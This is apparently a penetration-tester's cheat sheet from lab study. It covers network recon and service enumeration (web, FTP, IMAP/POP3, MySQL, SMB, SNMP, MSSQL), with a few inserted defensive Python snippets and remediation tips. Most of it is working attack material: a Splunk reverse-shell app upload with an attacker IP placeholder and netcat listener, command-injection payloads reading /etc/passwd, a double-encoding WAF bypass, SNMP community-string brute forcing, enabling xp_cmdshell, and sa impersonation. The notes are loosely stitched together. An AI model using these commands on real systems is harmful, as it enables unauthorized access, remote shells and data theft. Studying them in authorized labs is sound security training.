1. Passive Listen (Responder / tcpdump) (Run Responder in passive mode or tcpdump to observe broadcast traffic, discover hosts, and passively collect credentials before any active scanning)
2. Interface & Subnet Mapping (Identify your own IP and CIDR via ip a or ipconfig to define the scope)
3. Passive Neighbor Discovery (Check the local ARP cache via arp -a or ip neigh to see connected peers)
4. Active Host Discovery (Run nmap -sn <CIDR> or netdiscover to sweep the subnet via ARP/ICMP)
5. Role Identification (Scan live hosts for specific ports like 88/445/389 to distinguish DCs from workstations)
The following sections detail how to enumerate various web applications, which could lead to exploitation and access.
EyeWitness
For quick web application discovery.
# https://github.com/RedSiege/EyeWitness
git clone https://github.com/RedSiege/EyeWitness.git && cd EyeWitness/setup
# cmake is already a part of build-essential
sed -i 's/cmake//gI' ./setup.sh
sudo ./setup.sh
cd ..
source eyewitness-venv/bin/activate
# SCAN using nmap XML results output
mkdir ../scan_eyewitness
python Python/EyeWitness.py --web -x ../scan_nmap_disc_all_ports.xml -d ../scan_eyewitness
Weak or null authentication is the most likely vector.
Splunk WebApp
sudo nmap -sV -p 8000,8089 <TARGET>
Uploading Callback Shell
<TARGET>/en-US/app/launcher/home
# Splunk Reverse Shell
git clone https://github.com/0xjpuff/reverse_shell_splunk.git
cd reverse_shell_splunk/reverse_shell_splunk/
# !!! UPDATE !!!
# Change 'attacker_ip_here' and 'attacker_port_here' in the respective script(s)
cd ..
tar -cvzf updater.tar.gz reverse_shell_splunk/
nc -lvnp 8443
# NOTE: uploading the app causes it to run immediately; ensure `nc` is running
# From <TARGET>/en-US/manager/search/apps/local > Install app from file
PRTG Network Monitor
PRTG WebApp
sudo nmap -sV -p 80,443,8080 <TARGET>
curl -s <TARGET> | grep -i Version
osTicket
For some public-facing services, one can acquire a valid internal email address by submitting a ticket, though this might require email activation.
Use a security plugin such as WordFence, which includes security monitoring, blocking of suspicious activity, country blocking, two-factor authentication, and more.
A plugin such as AdminExile can be used to require a secret key to log in to the Joomla admin page, e.g. http://joomla.inlanefreight.local/administrator?thisismysecretkey.
Limit access to the Tomcat Manager and Host-Manager applications to only localhost. If these must be exposed externally, enforce IP whitelisting and set a very strong password and non-standard username.
# Domain => Subdomains via Cert Registry
curl -s "https://crt.sh/?q=<DOMAIN>&output=json" | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u | tee subdomainlist.txt
# Full Info
for i in $(cat subdomainlist.txt) ; do host $i | tee -a hostinfo.txt ; done
# (IPv4) Domain Name => IP Address
for i in $(cat subdomainlist.txt) ; do host $i | grep "has address" | cut -d" " -f1,4 | tee -a domain_ipaddress.txt ; done
# (IPv4) Addresses Only (second column of the name/address pairs collected above)
cut -d" " -f2 domain_ipaddress.txt | sort -u | tee ip-addresses.txt
# (IPv4) Addresses => Services via Shodan
for i in $(cat ip-addresses.txt) ; do shodan host $i ; done
# DNS: old technique
dig any <DOMAIN>
# Content Search: google.com Dork
inurl:<DOMAIN> intext:<TERM>
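An added example, not from the original notes: the same crt.sh extraction as the first pipeline above, done on the JSON directly for an external asset inventory. It splits each name_value on newlines and keeps only names under the queried domain; the sample JSON is constructed and the domain example.com is an assumption.

```python
import json

# Constructed sample of crt.sh's JSON output (?output=json); not real certificate data.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\nvpn.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "mail.example.com",
     "name_value": "MAIL.EXAMPLE.COM\nwww.example.com"},
])

def subdomains_from_crtsh(raw_json, domain):
    """Unique, lower-cased hostnames under `domain` from crt.sh JSON.
    `name_value` carries one or more SAN names separated by newlines, which is
    the field the shell pipeline above splits on '\\n'; `issuer_name` also
    matches grep 'name', which is why that pipeline needs its grep -v "CN=" step."""
    names = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower().rstrip(".")
            # keep only names under the domain that was queried
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return sorted(names)

def split_wildcards(names):
    """Separate resolvable hostnames from wildcard SANs (not hosts to resolve;
    record the zone they cover instead)."""
    literal = [n for n in names if not n.startswith("*.")]
    return literal, [n for n in names if n.startswith("*.")]
```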
LLMNR & NBT-NS
UDP 5355: LLMNR (modern)
UDP 137: NBT-NS (ancient)
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components used as fallback name-resolution protocols when DNS is unavailable.
A Windows host attempts to resolve a hostname in this order:
Checks Local HOSTS file.
Checks DNS Cache / DNS Server.
(If DNS Fails): Sends LLMNR Multicast.
(If LLMNR Fails): Sends NBT-NS Broadcast.
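An added example, not from the original notes: a decoder for the two datagram types a Windows host emits at the last two steps above, the kind of logic a network sensor uses to flag machines that are falling back to LLMNR/NBT-NS and are therefore exposed to poisoning. The sample packets are constructed here; the port constants and the name FILESERVER are assumptions.

```python
import struct

LLMNR_PORT, NBTNS_PORT = 5355, 137  # UDP: multicast 224.0.0.252 / subnet broadcast

def nbt_encode(name, suffix=0x20):
    """First-level encode a NetBIOS name (RFC 1001 s14.1): pad to 15 bytes, add the
    suffix byte, then write each nibble as a letter 'A'..'P' (32 chars total)."""
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0xF)) for b in raw)

def _check_query_header(data):
    """Both protocols reuse the 12-byte DNS header; reject responses (QR bit) and empty questions."""
    _txid, flags, qdcount = struct.unpack("!HHH", data[:6])
    if flags & 0x8000 or qdcount < 1:
        raise ValueError("not a query")

def decode_llmnr_query(data):
    """Queried name from an LLMNR query: plain DNS labels (RFC 4795)."""
    _check_query_header(data)
    pos, labels = 12, []
    while data[pos]:
        n = data[pos]
        labels.append(data[pos + 1:pos + 1 + n].decode("ascii"))
        pos += 1 + n
    return ".".join(labels)

def decode_nbtns_query(data):
    """(name, suffix) from an NBT-NS name query: undo the nibble encoding above."""
    _check_query_header(data)
    if data[12] != 32:
        raise ValueError("unexpected encoded name length")
    enc = data[13:45]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15]

def classify(dst_port, payload):
    """Tag a UDP datagram as an LLMNR/NBT-NS query, i.e. a host that fell past DNS
    and will accept an answer from anyone on the segment; None for other traffic."""
    if dst_port == LLMNR_PORT:
        return "LLMNR", decode_llmnr_query(payload)
    if dst_port == NBTNS_PORT:
        return "NBT-NS", decode_nbtns_query(payload)[0]
    return None

# Constructed sample datagrams (not real captures): each asks for FILESERVER.
HDR = struct.pack("!HHHHHH", 0x1234, 0x0000, 1, 0, 0, 0)  # id, flags, qd, an, ns, ar
SAMPLE_LLMNR = HDR + b"\x0afileserver\x00" + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN
SAMPLE_NBTNS = (HDR + b"\x20" + nbt_encode("FILESERVER").encode("ascii") + b"\x00"
                + struct.pack("!HH", 0x20, 1))  # QTYPE NB, QCLASS IN
```

Any hit from classify() on a segment where DNS is healthy is worth an alert, since it is exactly the query a poisoner answers.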
Remediation
Disabling LLMNR and NBT-NS is the typical fix; roll it out cautiously (to ensure nothing breaks) at the network or host level.
Disable LLMNR by:
Group Policy –>
Computer Configuration –>
Administrative Templates –>
Network –>
DNS Client
Enable “Turn OFF Multicast Name Resolution”
Disable NBT-NS (locally on each host, or via GPO with a PowerShell script):
Network and Sharing Center –>
Control Panel –>
Change adapter settings
Right-click the adapter –> Properties –>
Select Internet Protocol Version 4 (TCP/IPv4) –> Properties –> Advanced –> WINS tab –> Disable NetBIOS over TCP/IP
Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE?
# Connect to FTP server in passive mode with anonymous login
ftp -p ftp://<USER>:<PASS>@<TARGET>
passive
# lftp equivalents
lftp ftp://<USER>:<PASS>@<TARGET>
set ftp:passive-mode off
# Execute local commands (outside of session)
!<COMMAND>
# List files and directories
ls -la
ls -laR
# Read file
get <FILENAME> -
# Download file
get <FILENAME>
# Upload file
put <FILENAME>
# Download all files
mirror .
# Download ALL files
mkdir ftp_files && cd ftp_files
wget -m --no-passive-ftp ftp://anonymous:anonymous@<TARGET>
1. Technology & Security Fingerprinting (Use whatweb and nikto to identify the server, frameworks, and WAF, and curl to inspect headers and robots.txt)
2. Content & vHost Discovery (Run feroxbuster or gobuster dir to bruteforce directories/files, and gobuster vhost to find hidden virtual hosts)
3. Automated Vulnerability Scanning (Use nikto or wapiti to scan for common misconfigurations and known vulnerabilities like outdated software)
4. Manual Application Testing (OWASP Top 10) (After automated scans, manually inspect the application for logical flaws, focusing on Injection, Broken Access Control, and XSS)
# NOTE: filter out by response size since an HTTP response of 200 OK will always be received
ffuf -ic -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -H 'Host: FUZZ.<DOMAIN>' -u http://<TARGET>/ -fs <SIZE>
# Add NEW vHosts to automatically resolve them later
echo '<IP_ADDR> <VHOST>.<FQDN>' | sudo tee -a /etc/hosts
# 1. Curl Auto-Encoding (GET Requests)
# -G converts --data into a GET query string. --data-urlencode handles the special chars.
curl -G -i "http://<TARGET>/cgi/welcome.bat" --data-urlencode "cmd=C:\windows\system32\whoami.exe & id"
# 2. Python One-Liner (For generating payloads for Burp/Browser)
# NOTE: the space before the quoted argument matters; without it the shell glues it onto the -c code string
python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))" 'cat /etc/passwd & id'
# 3. The "Slicker Way" (Add this to your ~/.zshrc or ~/.bashrc)
alias urlencode='python3 -c "import urllib.parse, sys; print(urllib.parse.quote(sys.argv[1]))"'
# Usage: urlencode "payload&goes=here"
URL Encoding (Percent-Encoding) is not an obfuscation technique; it is a mechanical requirement of the HTTP protocol. You must encode characters to stop the Web Server from confusing your Payload Data with HTTP Syntax.
Character | HTTP Syntax Meaning | Why it breaks exploits if unencoded
& | Parameter Separator | Server splits your payload: ?cmd=id & whoami becomes Param 1: cmd=id, Param 2: whoami.
# | URL Fragment | Browser stops sending data after #; the backend never sees it.
(space) | + / %20 | Raw spaces break the HTTP request-line structure (GET /page HTTP/1.1).
? | Query String Start | Truncates or confuses path traversal payloads.
The CGI / Command Injection Rule:
When exploiting CGI scripts (.sh, .bat, .cgi), the web server decodes the URL and hands the resulting string directly to the OS shell (/bin/bash or cmd.exe). If you do not URL-encode your shell operators (&, |, ;), the web server consumes them as HTTP syntax during request parsing (splitting on &, for example), and the OS shell never receives them.
Double Encoding (WAF Bypass): if a WAF blocks %5C (\), encode the % symbol itself (% = %25), so the payload becomes %255C. The WAF sees %255C (allowed) and passes it to the backend, which decodes it once to %5C; the application then decodes it again to \.
Space Variants:
In the URL Path (GET /path%20here), use %20.
In the Query String / Body (?cmd=id+whoami), + is historically interpreted as a space (application/x-www-form-urlencoded), but %20 is universally safer to avoid parsing desyncs. Default to %20.
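An added example, not from the original notes, giving the server-side view of the table and rules above: it splits a query string before decoding, as a server does, and decodes each value repeatedly so a filter or log reviewer can see what a single-pass decoder misses on input like %255C. The parameter names and the blocked-character list are assumptions.

```python
from urllib.parse import unquote, unquote_plus

def normalize_url_param(value, in_path=False, max_passes=3):
    """Decode percent-encoding until the value stops changing.
    Returns (decoded, passes): passes > 1 means the value was double (or deeper)
    encoded. In the query string or a form body '+' is a space
    (x-www-form-urlencoded); in the path it is a literal '+', which is why the
    notes above default to %20."""
    decoder = unquote if in_path else unquote_plus
    current, passes = value, 0
    for _ in range(max_passes):
        decoded = decoder(current)
        if decoded == current:
            break
        current, passes = decoded, passes + 1
    return current, passes

def split_query(raw_query):
    """Split a raw query string the way a server does: on '&' first, then on '='.
    Decoding happens per field AFTER the split, so an unencoded '&' inside a
    value becomes a second parameter (the ?cmd=id & whoami case above)."""
    params = []
    for field in raw_query.split("&"):
        key, _, val = field.partition("=")
        params.append((unquote_plus(key), unquote_plus(val)))
    return params

def inspect_query(raw_query, blocked=("\\", ";", "|", "&")):
    """Per-parameter view for a WAF rule or a log reviewer: the fully decoded value,
    how many decode passes it took, and whether a blocked shell operator only
    surfaces after more than one pass (a single-decode filter would miss it)."""
    findings = []
    for field in raw_query.split("&"):
        key, _, val = field.partition("=")
        decoded, passes = normalize_url_param(val)
        hit = [c for c in blocked if c in decoded]
        findings.append({"param": key, "decoded": decoded, "passes": passes,
                         "blocked_chars": hit,
                         "hidden_by_double_encoding": bool(hit) and passes > 1})
    return findings
```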
The following settings adjust log verbosity and control whether submitted passwords and the authentication scheme are logged:
Setting | Description
auth_verbose | Logs unsuccessful authentication attempts and their reasons.
auth_verbose_passwords | Passwords used for authentication are logged (and can also be truncated).
auth_anonymous_username | The username to be used when logging in with the ANONYMOUS SASL mechanism.
# Enumerate
sudo nmap -n -Pn -sV -sC -p25,110,143,465,587,993,995 <TARGET>
### Non-Interactive
# IMAPS
curl -vkL --user '<USER>':'<PASSWORD>' 'imaps://<TARGET>' -X <COMMAND>
# POP3S
curl -vkL --user '<USER>':'<PASSWORD>' 'pop3s://<TARGET>' -X <COMMAND>
### Interactive
# IMAPS
openssl s_client -connect <TARGET>:imaps
1 LOGIN <USERNAME> <PASSWORD>
1 LIST "" *                    # Lists all directories
1 SELECT "<MAILBOX>"           # Selects a mailbox
1 UNSELECT "<MAILBOX>"         # Exits the selected mailbox
1 FETCH <ID> all               # Metadata of email
1 FETCH 1:* (BODY[])           # Show all emails
1 CREATE "INBOX"               # Creates a mailbox with a specified name
1 DELETE "INBOX"               # Deletes a mailbox
1 RENAME "ToRead" "Important"  # Renames a mailbox
1 LSUB "" *                    # Returns a subset of names from the set of names that the user has declared as being active or subscribed
1 CLOSE                        # Removes all messages with the Deleted flag set
1 LOGOUT                       # Closes the connection
# POP3S
openssl s_client -connect <TARGET>:pop3s
USER <USERNAME>
PASS <PASSWORD>
STAT       # List number of saved emails on the server
LIST       # List number and size of all emails
RETR <ID>  # Deliver the requested email by ID
DELE <ID>  # Delete the requested email by ID
CAPA       # Display the server capabilities
RSET       # Reset the transmitted information
QUIT       # Close connection
mysql - is the system database that contains tables that store information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - is a feature for monitoring MySQL Server execution at a low level
sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
secure_file_priv may be set as follows:
If empty, the variable has no effect, which is not a secure setting.
If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
If set to NULL, the server disables import and export operations.
-- Show Version
SELECT @@version;
SELECT version();
-- Show User
SELECT USER();
SELECT CURRENT_USER();
SELECT user FROM mysql.user;
SHOW databases;
SHOW grants;
-- Show if user is privileged
SELECT super_priv FROM mysql.user;
SELECT super_priv FROM mysql.user WHERE user="root";
-- Show user permissions
SELECT grantee, privilege_type FROM information_schema.user_privileges;
SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'";
-- look for interesting perms like "FILE" to read/write files
-- Tables and metadata
USE sys;
SELECT host, unique_users FROM sys.host_summary;
USE <DATABASE>;
SHOW tables;
DESCRIBE <TABLE>;
-- Write data
INSERT INTO <TABLE> VALUES (<COL1_VAL>, <COL2_VAL>, <COL3_VAL>, ...);
-- Get data
SELECT * FROM <TABLE> WHERE <COLUMN>="<VALUE>";
-- WHERE x LIKE "%blah%";
SELECT * FROM <TABLE> WHERE <COLUMN> LIKE "%<VALUE>%" ORDER BY <COLUMN> ASC|DESC LIMIT <NUM>;
-- Example COUNT
SELECT COUNT(*) FROM <TABLE> WHERE <COLUMN1> > 10000 OR <COLUMN2> NOT LIKE '%<KEYWORD>%';
Enumeration
MySQL
These commands are specific, though not necessarily exclusive, to MySQL.
Payload | When to Use | Expected Output | Wrong Output
SELECT @@version | When we have full query output | MySQL version (e.g. 10.3.22-MariaDB-1ubuntu1) | In MSSQL it returns the MSSQL version; errors with other DBMSs.
# Show currently used database (if inside a query)
SELECT database();
USE information_schema ; # metadata
# Get database names
SELECT schema_name FROM information_schema.schemata ;
# Show tables
SELECT table_name, table_schema FROM information_schema.tables WHERE table_schema='<DATABASE>' ;
# Get columns
SELECT COLUMN_NAME, TABLE_NAME, TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='<TABLE>' ;
# Finally read values
SELECT <COLUMN> FROM <DATABASE>.<TABLE> ;
1. Anonymous Access & Share Listing (Attempt a null session via smbclient -L <IP> -N or crackmapexec smb <IP> --shares to list shares without credentials)
2. Comprehensive Enumeration (Run enum4linux-ng -A <IP> to automatically dump users, groups, OS info, and password policies)
3. Share Content Inspection (Mount accessible shares or use smbclient to browse directories for sensitive files, scripts, or backups)
4. Security Posture Check (Use nmap --script=smb-security-mode to verify if SMB signing is required, which is critical for preventing relay attacks)
Dangerous Settings
Setting | Description
browseable = yes | Allow listing available shares in the current share?
read only = no | Forbid the creation and modification of files?
writable = yes | Allow users to create and modify files?
guest ok = yes | Allow connecting to the service without using a password?
enable privileges = yes | Honor privileges assigned to specific SID?
create mask = 0777 | What permissions must be assigned to the newly created files?
directory mask = 0777 | What permissions must be assigned to the newly created directories?
logon script = script.sh | What script needs to be executed on the user’s login?
magic script = script.sh | Which script should be executed when the script gets closed?
magic output = script.out | Where the output of the magic script needs to be stored?
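An added example, not from the original notes: a small audit of an smb.conf excerpt against the table above. It uses Python's configparser (Samba's file is INI-like), treats `read only` and `writable` as the same inverted switch, and reports findings per share; the sample configuration is constructed.

```python
import configparser
import io

# Constructed smb.conf excerpt for the audit (not taken from any real host).
SAMPLE_SMB_CONF = """
[global]
   workgroup = CORP
[public]
   path = /srv/public
   guest ok = yes
   read only = no
   create mask = 0777
   directory mask = 0777
[finance]
   path = /srv/finance
   writable = yes
   logon script = script.sh
"""

def share_is_writable(s):
    """'read only' (default yes) and 'writable' are one Samba switch, inverted;
    flag the share if either form grants write access."""
    return (s.get("writable", "no").strip().lower() == "yes"
            or s.get("read only", "yes").strip().lower() == "no")

def audit_smb_conf(text):
    """Return {share: [finding, ...]} for the settings the table above calls dangerous."""
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.read_file(io.StringIO(text))
    findings = {}
    for name in cp.sections():
        if name == "global":
            continue
        s, issues = cp[name], []
        guest = s.get("guest ok", "no").strip().lower() == "yes"
        if guest:
            issues.append("guest ok = yes: no password required")
        if share_is_writable(s):
            issues.append("writable share" + (" reachable by guests" if guest else ""))
        for key in ("create mask", "directory mask"):
            if s.get(key, "").strip().endswith("777"):
                issues.append(f"{key} = {s[key].strip()}: world-writable new entries")
        for key in ("logon script", "magic script", "magic output"):
            if key in s:
                issues.append(f"{key} = {s[key].strip()}: script execution hook set")
        if issues:
            findings[name] = issues
    return findings
```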
With this setting, the SMTP server can send fake emails and thus initiate communication between multiple parties. Another attack possibility is to spoof the email and read it.
A Management Information Base (MIB) is a text file of Object Identifiers (OIDs), written in the Abstract Syntax Notation One (ASN.1) based ASCII text format, which provide the addresses used to access device information. Community strings act as a sort of “password” that determines the access level.
Dangerous Settings
Setting | Description
rwuser noauth | Provides access to the full OID tree without authentication.
rwcommunity <COMMUNITY_STRING> <IPv4_ADDR> | Provides access to the full OID tree regardless of where the requests were sent from.
rwcommunity6 <COMMUNITY_STRING> <IPv6_ADDR> | Same access as with rwcommunity, but using IPv6.
# Enum via nmap
sudo nmap -n -Pn -sU -p161 -sV --script 'snmp*' --reason -oA nmap_snmp_scan <TARGET>
### Brute-force names of Community Strings
# - Default Strings: "public" (Read-Only) and "private" (Read/Write) are common
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <TARGET>
# probably "public"
### Brute-force OIDs and info
# -v 1,2c,3
snmpwalk -v <VERSION> -c <COMMUNITY_STRING> <TARGET> .1
### Brute-force OIDs
# -2 : use v2
# braa usually uses Version 1
braa <COMMUNITY_STRING>@<TARGET>:.1.*
braa <COMMUNITY_STRING>@<TARGET>:.1.3.6.*
master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in the sys schema.
tempdb - keeps temporary objects for SQL queries.
xp_cmdshell:
xp_cmdshell is a powerful feature and is disabled by default. It can be enabled and disabled using Policy-Based Management or by executing sp_configure.
The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account.
xp_cmdshell operates synchronously: control is not returned to the caller until the command-shell command has completed.
Weak or default sa credentials: admins may forget to disable this account.
# Enumerate via nmap
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=<USER>,mssql.password=<PASSWORD>,mssql.instance-name=MSSQLSERVER -sV -p 1433 <TARGET>
# Enumerate via MSF
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <TARGET>
run
### Login via Windows auth
impacket-mssqlclient -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
impacket-mssqlclient <USER>:<PASSWORD>@<TARGET>
-- Survey
SELECT @@version;
SELECT user_name();
SELECT system_user;
SELECT IS_SRVROLEMEMBER('sysadmin'); -- 1 is admin
-- Users
SELECT name FROM master..syslogins;
-- Databases
SELECT name FROM master..sysdatabases;
-- Show tables
USE <DATABASE>;
SELECT name FROM sys.tables;
Read Files
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents;
enable_xp_cmdshell
-- These are the same as the above single command
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell <COMMAND>
-- or run linked server command
EXECUTE('xp_cmdshell ''<DOS_CMD>''') AT [<LINKED_SERVER>]
Impersonate User
SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';
GO
-- Impersonating the SA User (admin)
USE master
EXECUTE AS LOGIN = 'sa'
-- Verify
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- 0 is NOT admin